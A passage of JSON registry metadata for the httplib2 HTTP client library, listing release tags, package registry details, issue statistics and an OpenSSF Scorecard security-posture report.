},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:58:22.700Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":null,"forks_count":null,"average":8.172500131868823},"purl":"pkg:golang/github.com/httplib2/httplib2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/httplib2/httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/httplib2/httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/httplib2/httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhttplib2%2Fhttplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhttplib2%2Fhttplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhttplib2%2Fhttplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhttplib2%2Fhttplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhttplib2%2Fhttplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fhttplib2%2Fhttplib2/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2281915,"maintainers_count":0,"namespaces_count":839492,"keywords_count":125216,"github":"golang","metadata":{"funded_packages_count":67974,"sync_missing_packages_cursor":{"timestamp":"2026-08-17T00:00:58.969562Z","path":"github.com/Tektoncd/operator","version":"v0.78.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-25T05:01:14.867Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":5287477,"name":"httplib2","ecosystem":"conda","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":null,"versions_count":27,"first_release_published_at":"2022-10-03T15:44:42.418Z","latest_release_published_at":"2022-11-01T12:28:00.000Z","latest_release_number":"0.21.0","last_synced_at":"2026-03-17T06:12:30.862Z","created_at":"2022-10-03T15:44:42.409Z","updated_at":"2026-08-22T03:48:32.205Z","registry_url":"https://anaconda.org/conda-forge/httplib2","install_command":"conda install -c conda-forge httplib2","documentation_url":null,"metadata":{},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed 